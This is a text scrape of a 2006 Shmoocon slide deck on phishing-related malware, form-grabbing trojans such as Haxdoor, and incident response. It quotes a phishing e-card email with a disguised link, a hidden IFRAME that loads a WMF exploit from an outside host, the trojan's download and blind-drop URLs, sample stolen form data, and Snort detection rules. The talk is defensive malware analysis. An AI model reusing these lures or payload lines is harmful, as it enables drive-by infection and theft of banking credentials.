400 likes | 625 Views
Shmoocon ‘06 Lance James Secure Science Corporation. Trojans & Botnets & Malware, Oh My!. What this talk is about?. Malware In regards to incident response Pre-emptive Techniques Research & Development Related mainly to theft-intended malware What is Malware? Malicious Software/Hardware
E N D
Shmoocon ‘06 Lance James Secure Science Corporation Trojans & Botnets & Malware, Oh My!
What this talk is about? • Malware • In regards to incident response • Pre-emptive Techniques • Research & Development • Related mainly to theft-intended malware • What is Malware? • Malicious Software/Hardware • Designed to be harmful
Cyber Attack SophisticationContinues To Evolve bots Cross site scripting Tools “stealth” / advanced scanning techniques High Stagedattack packet spoofing denial of service distributed attack tools sniffers Intruder Knowledge sweepers www attacks automated probes/scans GUI back doors network mgmt. diagnostics disabling audits hijacking sessions burglaries Attack Sophistication exploiting known vulnerabilities password cracking self-replicating code Attackers password guessing Low 2000+ 1980 1985 1990 1995 Source: CERT
And Continue To Grow… 85%of respondentshad breaches — CSI/FBI survey Avg reported loss from attacks was $2.7M per incident — CSI/FBI survey 85% of the critical infrastructure is owned or operated by the private sector 137,000 security incidents in 2003, nearly twice as many as in 2002 — CERT Data theft grew more than 650% over the past 3 years — CSI/FBI Source : Carnegie Mellon
Growth Or Liability? • Over twenty per cent of Internet users now access online banking services. • This total will reach 33% by 2006, according to The Online Banking Report. • By 2010, over 55 million US households will use online banking and ePayments services, which are tipped as "growth areas". • Wamu buys Providian, BofA buys MBNA • And so what about the ‘Phishing’ threat to e-commerce? Source: ePaynews
What Is Phishing? • Phishing, also referred to as brand spoofing, as it is a variation on “fishing,” the idea being that bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into biting. • Phishing is the act of sending a communication to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. • The communication (usually email) directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. • The Web site, however, is bogus or hostile and set up only to steal the user’s information.
What’s Worse? • Email Phish or Phishing Malware? • Some of the larger phishing groups have associations with both phishing emails and key-logging malware. • While phishing email is very effective, the number of victims is significantly smaller than the victims of phishing malware. • Logs recovered from base camps for phishing emails and malware show a startling difference.
Phishing Emails Phishing Malware / Keyloggers Average number of accounts compromised in a week 100 500,000 Type of information compromised Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother’s maiden name or the answer to the “forgot your password” prompt. Generally, victims provide all of the information asked. Account login, or credit card number with expiration and address. Generally, a single victim only loses a single amount of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher. Volume of data generated Each victim = < 500 bytes of data. 1 week = < 50Kbytes. A single person can process the data in minutes. A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process. Email –vs- Malware
Phishing Emails Phishing Malware / Key loggers How often is the method viable? Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited – information is almost never collected from the same person twice. Most malware is effective for a week before anti-virus vendors develop signatures. Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information. A single person that is infected may compromise the same information multiple times. Total development cost to the phishers? A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server. A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months. Email –vs- Malware (cont.)
Phishing Malware (cont.) • In November of 2003, the concept of a single mega-virus changed. • Gaobot, followed by Sasser and Berbew, took a different tact: rather than one mega-worm, these consisted of hundreds of variants – each slightly different. • The goal of the variant was not to become a mega-worm, but rather to infect a small group of systems.
Phishing Malware (cont.) • This approach provided two key benefits to the malware authors: • Limited distribution; limited detection. As long as the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton doesn’t know about a virus, then they cannot create a detection signature for the virus.) • Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, carders, and generic malware authors that are not detected by anti-virus software. • Rapid deployment.. Nearly a hundred variants of Sasser were identified in less than three months. Each variant requires a different detection signature. The rapid modification and deployment ensures that anti-virus vendors will overtax their available resources, becoming less responsive to new strains. It also ensures that some variants will not be detected.
Phishing Malware (cont.) • We’re seeing a significant increase in malware used by phishing groups. • IE exploitation via ActiveX Blended Threats • Let’s take a closer look at the malware, and the threat model behind phishers and their malware. • Malware key-logging myths
Phishing Malware (cont.) • A few phishing groups have been associated with specific malware. • The malware is used for a variety of purposes: • Compromising hosts for operating the phishing server; • Compromising hosts for relaying the bulk mailing; • Directly attacking clients with key-logging software. • A single piece of malware may serve any or all of these purposes.
Malware Trends • In early 2004, the malware associated with phishing groups rarely appeared to be created specifically for phishing. Instead, was focused on botnet* attributes: • Email relay. The software opens network services that can be used to relay email anonymously. This is valuable to phishers, and spammers in general. • Data mining. The malware frequently contains built-in functions for gathering information from the local system. The gathering usually focuses on software licenses (for game players , warez, or serialz dealers**) and Internet Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets. * A compromised system with remote control capabilities is a “bot”. A “botnet” is a collection of these compromised hosts. ** Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and propagated through the underground software community.
Malware Trends (cont.) • Remote control. The malware usually has backdoor capabilities. This permits a remote user to control and access the compromised host. For a phisher, there is little advantage to having a backdoor to a system unless they plan to use the server for hosting a phishing site. But for other people, such as virus writers or botnet farmers*, remote control is an essential attribute. * A “botnet farmer” is an individual or group that manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.
Malware Trends (cont.) • By Q3 of 2004, a few, large phishing groups had evolved to support their own specific malware. • While the malware did contain email relays, data mining functions, and remote control services, these had been tuned to support phishing specifically. • Viruses such as W32.Spybot.Worm included specific code to harvest bank information from compromised hosts.
Malware Trends (cont.) • A few phishing groups also appeared associated with key logging software. • While not true “key logging”, these applications capture data submitted (posted) to web servers. • A true key logger would generate massive amounts of data and would be difficult for an automated system to identify account and login information.
Malware Trends (cont.) • Instead, these applications hook into Internet Explorer’s (IE) form submission system. • All data from the submitted form is relayed to a blind drop operated by the phishers. • The logs contain information about the infected system, as well as the URL and submitted form values. • More importantly, the malware intercepts the data before it enters any secure network tunnel, such as SSL or HTTPS.
Malware Trends (cont.) • Examples of data output: • Recent examples of HaxDoor, Berbew and PWS.Banker reveal similar “Formgrabbing” • reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=******* • onlineid.bankofamerica.com/cgi-bin/sso.login.controller • [11023586123662948896] • [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32] • Distributed through IE Class-ID attacks • ADB/CHM • IFRAME TAG • Javaprxy???
Side-Bar, Case Example • Anti-Malware Snake-Oil • Virtual Keyboards • Key-board Logging Protection • Scramble Pads • Anti-Spyware Desktop software • 99% of Information Theft Malware doesn’t log key strokes! (it’s unscalable)
Malware Trends (cont.) • The end of 2004 showed a significant modification to the malware used by some phishing groups. • The prior key logging systems generated gigabytes of data in a very short time. This made data mining difficult, since only a few sites were of interest to the phishers. • By the end of 2004 and into 2005, the phishers had evolved their software. • Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America. • It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was collected. • More importantly, multiple viruses appeared with this capability – indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware developers associated with phishers are in communication or have a common influencing source.
Malware Trends (cont.) • PG02 significant attack pattern identified • Cpanel (WebISP in a box) exploitation • System compromise • Payload launch • www.site.com/images/newex.html • Hijacks Network or Box for Spamming • Sending Spam • Uses DMS generation 2 • Enabling anonymity • Uses Dark IP space for forged receive header • Object Class Exploits for IE • Trojan Downloader payload • Classifies malware as “MSITS.exe” • Reference to MS-ITS protocol attacks • Uses GPL code from www.edup.tudelft.nl/~bjwever/ • Berend-Jan Wever website
Malware Trends (cont.) • Object Class attacks not “brand new” • Uses older ADB Exploit even though newer attacks exist • January-February 2005 haxdoor variants existed on for win98 • Suggests targeting “End of Life” product • Win98 EOL on security upgrades • No education on phishing • No SP2, built in pop-up blockers • Evolutionary pattern • Suggests Path of Least Resistance • Evolve when necessary • Win98 is plentiful and best target! • Why Move??
Latest Threats • WMF exploit • Discovered by Dan Hubbard (WebSense) • Found in the wild as a 0-day • Phishers were using it from Day 0 • It was supposed to be patched in November • MS05-053 • Nuclear Grabber used by Phishing Group #02 • Written by Corpse (Author of A-311 Death and Nuclear Grabber) • AV Vendors call it Haxdoor • Sells software on Corpsespyware.net from $250.00 to $2500.00 • Russian sales only
Phishing Trends (cont.) • Serial Pattern for process of Haxdoor • Successor to Berbew malware from 2004 • Very likely relation to original Berbew authors • ’05 Berbew marked with Corpse’s Signature • Haxdoor malware written in Assembly • Trojan Creation Kit • Compiles with permutations • Packed with FSG • Easy for Phishers to compile on the fly with customized Settings.
Latest Threats • Email from Phishing Group for WMF exploit Dear Friend, Friends [ fromfriends at aol.com ] has sent you an e-card from <A href="http://123Greetings.com">123Greetings.com</A> . <A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music. Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print. To view your e-card, choose from any of the following options: <a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td></tr></table></a>
What AV does with this? • Identify the Threat, Label it - Here’s their analysis
Problem? • Problem exists here • Labeled Low Threat based on AV metrics • Shoved in with the rest of the Trojan.small.em • No known resolve other than desktop prevention • Very reactive, (as we all know) • Evolving malware disables AV (common knowledge) • How do we change this? • Change the AV metric • Use common sense • Proactive, not reactive • Serial Pattern analysis w/ common sense is key
Incident Response • Emerging Threats • Management by Objective • Per incident basis • Threat modelling necessary (but usually never happens) • Malware author grouping • Serial Pattern • Pre-emptive Signatures • Forces them to evolve (ROI lowers) • Possible Apprehension
R&D + IR=Proactive • Research for Haxdoor • <IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME> • Grabs msits.exe from www.site.com/images/msits.exe • Packed with FSG (marked with Corpse Signature within Packing) 003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.com 003C1BE0PUSH ies4dll.003C11C9 ASCII "images/data.php“ • Blind drop Identified • Data recovered in realtime • Phishing the Phishers
Impact DOA • Blind drop log monitoring • Data returned to institution that’s compromised • Real-time risk mitigation • Pre-emptive Action • What do we know? • Packed with FSG • How many non-malicious executables are packed with FSG • Talks to /images/data.php • Some versions /images/dat7.php and /images/bsrv.php • Group titles it msits.exe and msys.exe • Bleeding-Edge Snort • alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;) • alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
Outcome • Snort Sigs • Prevent a large amount of new phishing malware • Corpse has to change his method • Many other phishing malware packed same way • Problem response vs Incident Response • Look at overall problem • Example: Form Grabbing • Assume everyone is infected • How do we solve this?
So you’re not a RCE • Tricks for IR • IEHTTPHEADERS • BHO and IE hooks • Uses IE as Agent • Locate Blind Drop • Monitor and Mitigate • VMWare • Sandbox (with snapshots) • Tools like sysinternals, Ollydbg, winpooch • Joe Stewart has some new tools for sandnet • As it becomes more prevalent • More tools available for the common response team • Common sense is sometimes the best weapon
Contact Info Secure Science Corporation 7770 Regents Rd. Suite 113-535 San Diego, CA. 92122-1967 (877)570-0455 http://www.securescience.net Email: info@securescience.net Lance James ~ CTO